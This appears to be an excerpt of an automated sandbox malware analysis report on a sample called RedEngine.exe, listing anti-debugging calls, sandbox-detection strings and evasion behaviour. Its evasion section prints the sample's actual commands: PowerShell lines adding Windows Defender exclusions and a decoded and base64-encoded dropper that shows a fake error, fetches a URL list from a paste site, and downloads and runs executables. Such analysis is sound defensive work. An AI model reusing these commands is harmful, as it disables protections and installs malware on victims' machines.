Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Check user administrative privileges: GetTokenInformation
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | API coverage: 5.2 %
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | API coverage: 2.4 %
Source: C:\Users\user\Desktop\RedEngine.exe TID: 7696 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956 | Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8092 | Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe TID: 2980 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe TID: 5264 | Thread sleep count: 6141 > 30
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe TID: 5264 | Thread sleep time: -153525s >= -30000s
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe TID: 5264 | Thread sleep count: 3853 > 30
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe TID: 5264 | Thread sleep time: -96325s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3268 | Thread sleep count: 2779 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2156 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1732 | Thread sleep count: 349 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3020 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1516 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080 | Thread sleep count: 2698 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072 | Thread sleep count: 440 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4580 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2172 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4036 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2700 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2936 | Thread sleep count: 4310 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5104 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2856 | Thread sleep count: 345 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4512 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6468 | Thread sleep count: 4334 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6468 | Thread sleep count: 1753 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | Thread sleep count: Count: 6141 delay: -25
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | Thread sleep count: Count: 3853 delay: -25
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 14_2_00007FF741BC85A0 FindFirstFileExW,FindClose,14_2_00007FF741BC85A0
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 14_2_00007FF741BC79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,14_2_00007FF741BC79B0
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 14_2_00007FF741BE0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,14_2_00007FF741BE0B84
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 31_2_00007FF741BC85A0 FindFirstFileExW,FindClose,31_2_00007FF741BC85A0
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 31_2_00007FF741BC79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,31_2_00007FF741BC79B0
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 31_2_00007FF741BE0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,31_2_00007FF741BE0B84
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 38_2_00007FF795B985A0 FindFirstFileExW,FindClose,38_2_00007FF795B985A0
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 38_2_00007FF795B979B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,38_2_00007FF795B979B0
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 38_2_00007FF795BB0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,38_2_00007FF795BB0B84
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FF795B985A0 FindFirstFileExW,FindClose,42_2_00007FF795B985A0
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FF795B979B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,42_2_00007FF795B979B0
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FF795BB0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,42_2_00007FF795BB0B84
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FFB23B00220 GetSystemInfo,VirtualAlloc,42_2_00007FFB23B00220
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | File opened: C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | File opened: C:\Users\user\AppData\Local\Temp\E8C.tmp
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | File opened: C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.tmp
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | File opened: C:\Users\user~1\
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | File opened: C:\Users\user~1\AppData\Local\
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | File opened: C:\Users\user~1\AppData\
Source: clppth.exe, 0000002A.00000002.3782245765.00000276FE3E1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWv
Source: powershell.exe, 00000003.00000002.1682036119.000001D470662000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWR_IN%SystemRoot%\system32\mswsock.dllT_BE_ABANDONEDCIM_ERR_FILTERED_ENUMERATION_NOT_SUPPORTEDCIM_ERR_CONTINUATION_ON_ERROR_NOT_SUPPORTEDCIM_ERR_SERVER_LIMITS_EXCEEDEDCIM_ERR_SERVER_IS_SHUTTING_DOWNCIM_ERR_QUERY_FEATURE_NOT_SUPPORTEDDMTF ReservedValueMap
Source: clppth.exe, 0000002A.00000002.3785563967.00000276FEBD0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: QhgfSERVER_KEY_EXCHANGE
Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.0000000002962000.00000004.00000800.00020000.00000000.sdmp, mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.0000000002958000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: \qemu-ga.exe
Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3779391365.0000019C7128F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3291813035.000001B21382B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3293854029.000001B218E42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3294028336.000001B218E55000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.0000000002471000.00000004.00000800.00020000.00000000.sdmp, mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.0000000002962000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: \qemu-ga.exe@\
Source: powershell.exe, 0000001E.00000002.2185599790.00000190D0F4B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

                        Anti Debugging

Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Code function: 11_2_00A72CC0 CheckRemoteDebuggerPresent,11_2_00A72CC0
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 14_2_00007FF741BD9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00007FF741BD9924
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | Code function: 13_2_0040A756 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,13_2_0040A756
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 14_2_00007FF741BE2790 GetProcessHeap,14_2_00007FF741BE2790
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | Code function: 13_2_00409950 SetUnhandledExceptionFilter,13_2_00409950
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | Code function: 13_2_00409930 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,13_2_00409930
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 14_2_00007FF741BCC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00007FF741BCC44C
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 14_2_00007FF741BCBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00007FF741BCBBC0
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 14_2_00007FF741BCC62C SetUnhandledExceptionFilter,14_2_00007FF741BCC62C
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 31_2_649413D0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,31_2_649413D0
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 31_2_00007FF741BD9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00007FF741BD9924
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 31_2_00007FF741BCC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00007FF741BCC44C
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 31_2_00007FF741BCBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_00007FF741BCBBC0
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 31_2_00007FF741BCC62C SetUnhandledExceptionFilter,31_2_00007FF741BCC62C
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 31_2_00007FFB040B3028 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00007FFB040B3028
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 31_2_00007FFB040B2A70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_00007FFB040B2A70
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 31_2_00007FFB0B48AA7C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00007FFB0B48AA7C
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 31_2_00007FFB0B48A050 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_00007FFB0B48A050
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 31_2_00007FFB226C5FA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_00007FFB226C5FA0
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 38_2_00007FF795B9C62C SetUnhandledExceptionFilter,38_2_00007FF795B9C62C
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 38_2_00007FF795BA9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_00007FF795BA9924
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 38_2_00007FF795B9C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_00007FF795B9C44C
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 38_2_00007FF795B9BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,38_2_00007FF795B9BBC0
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FF795B9C62C SetUnhandledExceptionFilter,42_2_00007FF795B9C62C
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FF795BA9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00007FF795BA9924
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FF795B9C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00007FF795B9C44C
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FF795B9BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_00007FF795B9BBC0
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FFB0D633028 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00007FFB0D633028
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FFB0D632A70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_00007FFB0D632A70
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FFB1C3C38A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_00007FFB1C3C38A0
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FFB1C3C3E60 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00007FFB1C3C3E60
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FFB1C541260 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_00007FFB1C541260
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FFB1C69DEDC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00007FFB1C69DEDC
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FFB1C69D4C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_00007FFB1C69D4C0
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FFB2272A050 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_00007FFB2272A050
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FFB2272AA7C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00007FFB2272AA7C
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB23AC1AA0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00007FFB23AC1AA0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB23AC14E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_00007FFB23AC14E0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB23AF5FA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_00007FFB23AF5FA0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB23AF6534 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00007FFB23AF6534
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB23B20AA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_00007FFB23B20AA8
                        Source: C:\Users\user\Desktop\RedEngine.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        Source: Yara match File source: amsi64_7768.amsi.csv, type: OTHER
                        Source: Yara match File source: amsi64_1316.amsi.csv, type: OTHER
                        Source: Yara match File source: Process Memory Space: powershell.exe PID: 7768, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: mgne4i3n.t1d1.exe PID: 6160, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: powershell.exe PID: 1316, type: MEMORYSTR
                        Source: Yara match File source: C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat, type: DROPPED
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\Local"
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\Local"
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
                        Source: C:\Users\user\Desktop\RedEngine.exe Process created: Base64 decoded <#blw#>Start-Process powershell -WindowStyle Hidden -ArgumentList "Add-Type -AssemblyName System.Windows.Forms;<#atr#>[System.Windows.Forms.MessageBox]::Show('Error #819: Cannot start due to missing dependencies, please install all the dependencies required.','','OK','Error')<#bqs#>;";<#emv#> Add-MpPreference <#ujf#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#uqm#> -Force <#wwx#>;$wc = (New-Object System.Net.WebClient);$lnk = $wc.DownloadString('https://rentry.org/pancek61111111111111/raw').Split([string[]]"`r`n", [StringSplitOptions]::None); $fn = [System.IO.Path]::GetRandomFileName(); for ($i=0; $i -lt $lnk.Length; $i++) { $wc.DownloadFile($lnk[$i], <#mct#> (Join-Path <#jmi#> -Path $env:AppData <#ign#> -ChildPath ($fn + $i.ToString() + '.exe'))) }<#vix#>; for ($i=0; $i -lt $lnk.Length; $i++) { Start-Process -FilePath <#wet#> (Join-Path -Path $env:AppData <#vvx#> -ChildPath ($fn + $i.ToString() + '.exe')) } <#xli#>
                        Source: C:\Users\user\Desktop\RedEngine.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAbAB3ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGEAdAByACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACAAIwA4ADEAOQA6ACAAQwBhAG4AbgBvAHQAIABzAHQAYQByAHQAIABkAHUAZQAgAHQAbwAgAG0AaQBzAHMAaQBuAGcAIABkAGUAcABlAG4AZABlAG4AYwBpAGUAcwAsACAAcABsAGUAYQBzAGUAIABpAG4AcwB0AGEAbABsACAAYQBsAGwAIAB0AGgAZQAgAGQAZQBwAGUAbgBkAGUAbgBjAGkAZQBzACAAcgBlAHEAdQBpAHIAZQBkAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGIAcQBzACMAPgA7ACIAOwA8ACMAZQBtAHYAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB1AGoAZgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB3AHcAeAAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAbgB0AHIAeQAuAG8AcgBnAC8AcABhAG4AYwBlAGsANgAxADEAMQAxADEAMQAxADEAMQAxADEAMQAxAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBtAGMAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGoAbQBpACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAZwBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwB2AGkAeAAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AGUAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdgB2AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHgAbABpACMAPgA="
